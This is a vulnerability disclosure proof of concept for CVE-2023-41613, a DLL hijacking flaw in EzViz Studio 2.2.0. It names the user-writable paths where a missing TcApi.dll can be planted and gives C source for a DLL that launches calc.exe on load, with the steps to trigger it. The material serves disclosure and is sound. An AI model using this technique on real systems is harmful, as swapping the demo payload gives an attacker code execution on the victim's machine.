PoC:

*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*

*Author: EAFZ aka myantti3m*

*CVE: **CVE**-2023-41613.*

*Test Environment:*

OS: Windows 11 Pro 64 bit(10.0,  Build 2261)

EzViz Studio version: 2.2.0

*Technical Description *

*1.  **Technical Description *

EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll
doesn’t exist in any of the paths of the DLL search order. In particular,
some paths have writable permissions for normal users as:

·         C:\Users\<Username>\AppData\Local\Programs\Microsoft VS
Code\bin\TcApi.dll

·         C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

So we can plant “malicious” TcApi.dll inside these directories and wait
until the application will load it.

*POC*

We created a malicious DLL file (TcApi.dll) and complied it. In our case,
it opens calc.exe. You can see the code below:

#include <windows.h>

#pragma comment (lib, "user32.lib")

#include "pch.h"

#include <iostream>

#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule,

       DWORD nReason, LPVOID lpReserved) {

       switch (nReason) {

       case DLL_PROCESS_ATTACH:

              system("calc.exe");



              break;

       case DLL_PROCESS_DETACH:

              break;

       case DLL_THREAD_ATTACH:

              break;

       case DLL_THREAD_DETACH:

              break;

       }

       return TRUE;

}

Copy “malicious” TcApi.dll to

C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

If we run the EzVizStudio again, the code from the “malicious” DLL runs